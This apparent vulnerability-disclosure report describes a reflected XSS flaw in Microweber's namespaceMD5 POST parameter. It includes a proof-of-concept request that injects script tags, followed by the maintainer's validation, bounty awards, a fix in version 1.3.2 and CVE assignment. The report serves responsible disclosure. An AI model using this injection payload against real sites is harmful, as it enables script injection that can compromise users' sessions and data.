Post parameter namespaceMD5 is vulnerable to reflected XSS in microweber/microweber

Valid

Reported on

Nov 8th 2022


Description

The POST parameter namespaceMD5 is vulnerable to reflected XSS.

Proof of Concept

// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content

Impact

JS injection.

We are processing your report and will contact the microweber team within 24 hours. a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov
a year ago

Hello

This error appears only when you have enable the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error

On user sites an on production sites, the debug mode is not enabled

Peter Ivanov gave praise a year ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Peter Ivanov
a year ago

oops sorry , i replied to the wrong vulnerability , checking this now

Peter Ivanov validated this vulnerability a year ago
Joel Verghese has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.3.2 with commit df8add a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 20th 2022
language_import.php#L32 has been validated
to join this conversation